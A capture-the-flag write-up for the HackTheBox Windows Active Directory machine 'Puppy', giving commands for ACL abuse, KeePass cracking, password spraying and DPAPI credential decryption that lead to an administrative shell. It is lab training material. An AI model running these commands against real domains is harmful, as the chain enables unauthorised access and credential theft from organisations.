All write-ups
8 min read

HackTheBox: Puppy

HackTheBoxWindowsActive DirectoryBloodHoundKeePassDPAPIACL Abuse

HackTheBox: Puppy

1. Reconnaissance & Enumeration

Provided Initial Credentials: levi.james / [REDACTED]

We began with a comprehensive TCP port scan against the target.

nmap -T4 -p- -v -A -oX puppy_tcp.scan 10.129.83.249 -Pn

Key Findings:

The target is an Active Directory Domain Controller named DC, serving the PUPPY.HTB domain. We updated our /etc/hosts file to resolve dc.puppy.htb.

SMB Share Enumeration

Using smbclient, we authenticated and listed available shares.

smbclient -L //dc.puppy.htb -U 'levi.james%[REDACTED]'

Shares Discovered:

Attempting to access the DEV share resulted in NT_STATUS_ACCESS_DENIED.

2. Active Directory Reconnaissance (BloodHound)

We extracted Active Directory data using bloodhound-python for offline analysis.

bloodhound-python -d PUPPY.HTB -u levi.james -p "[REDACTED]" -gc dc.puppy.htb -c all -ns 10.129.186.93

Importing the generated JSON files into the BloodHound GUI revealed critical Access Control List (ACL) relationships:

Tip: GenericWrite allows a principal to update attributes of a target object. In the context of a group, it permits modifying group membership.

3. ACL Abuse & File Extraction

We leveraged the GenericWrite privilege to add levi.james to the Developers group via RPC.

net rpc group addmem "Developers" "levi.james" -U "PUPPY.HTB"/"levi.james"%"[REDACTED]" -S "DC.PUPPY.HTB"

Verifying the membership:

net rpc group members "Developers" -U "PUPPY.HTB"/"levi.james"%"[REDACTED]" -S "DC.PUPPY.HTB"

With levi.james now a member of Developers, we successfully accessed the restricted DEV share.

smbclient //puppy.htb/DEV -U 'levi.james%[REDACTED]'
smb: \> get recovery.kdbx

4. KeePass Cracking & Lateral Movement

The extracted file, recovery.kdbx, is an encrypted KeePass database. We cracked its master password using a dictionary attack.

./keepass4brute.sh ~/recovery.kdbx /usr/share/wordlists/rockyou.txt

Result: Password cracked: [REDACTED].

Opening the database in KeePassXC revealed several sets of credentials. We compiled these into user.txt and passwords.txt and sprayed them across SMB using crackmapexec (or nxc).

crackmapexec smb 10.10.11.70 -u user.txt -p passwords.txt --continue-on-success

This validated credentials for the user ant.edwards ([REDACTED]).

Second ACL Abuse

Reviewing BloodHound data, ant.edwards holds GenericAll over the user adam.silver, granting full control, including the ability to reset passwords.

net rpc password "adam.silver" "[REDACTED]" -U "PUPPY.HTB"/"ant.edwards"%"[REDACTED]" -S "DC.PUPPY.HTB"

However, WinRM access for adam.silver failed because the account was disabled. Since GenericAll encompasses modifying UserAccountControl (UAC) flags, we enabled the account using bloodyAD.

bloodyAD --host 10.10.11.70 -d PUPPY.HTB -u ant.edwards -p '[REDACTED]' remove uac adam.silver -f ACCOUNTDISABLE

We subsequently authenticated via WinRM:

evil-winrm -i 10.10.11.70 -u adam.silver -p '[REDACTED]'

Result: Gained shell as adam.silver. User flag secured.

5. Privilege Escalation (DPAPI)

Further enumeration and password spraying yielded valid credentials for steph.cooper ([REDACTED]). Connecting via WinRM, we investigated the user's DPAPI (Data Protection API) artifacts.

DPAPI protects sensitive data (e.g., credentials) using a Master Key derived from the user's password. The Master Key is stored in %APPDATA%\Microsoft\Protect.

Extracting the Master Key File:

[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Users\steph.cooper\AppData\Roaming\Microsoft\Protect\S-1-5-21-1487982659-1829050783-2281216199-1107\556a2412-1275-4ccf-b721-e6a0b4f90407"))

We decoded the Base64 payload locally and saved it as master.key. We then used dpapi.py (from Impacket) to decrypt the Master Key using steph.cooper's SID and known password.

dpapi.py masterkey -file ~/master.key -sid S-1-5-21-1487982659-1829050783-2281216199-1107
# Provided password: [REDACTED]
# Output: Decrypted key: 0xd9a57072...

Decrypting the Credentials: We then extracted a protected credential blob from C:\Users\steph.cooper\AppData\Roaming\Microsoft\Credentials\ and decrypted it using the recovered Master Key.

dpapi.py credential -file ~/C8D69EBE9A43E9DEBF6B5FBD48B521B9 -key 0xd9a57072...

Result: Decrypted credentials for steph.cooper_adm (Password: [REDACTED]).

Authenticating as steph.cooper_adm via WinRM granted Administrative access.

evil-winrm -i 10.10.11.70 -u steph.cooper_adm -p '[REDACTED]'

Result: SYSTEM shell obtained. The root flag is located at C:\Users\Administrator\Desktop\root.txt ([REDACTED]).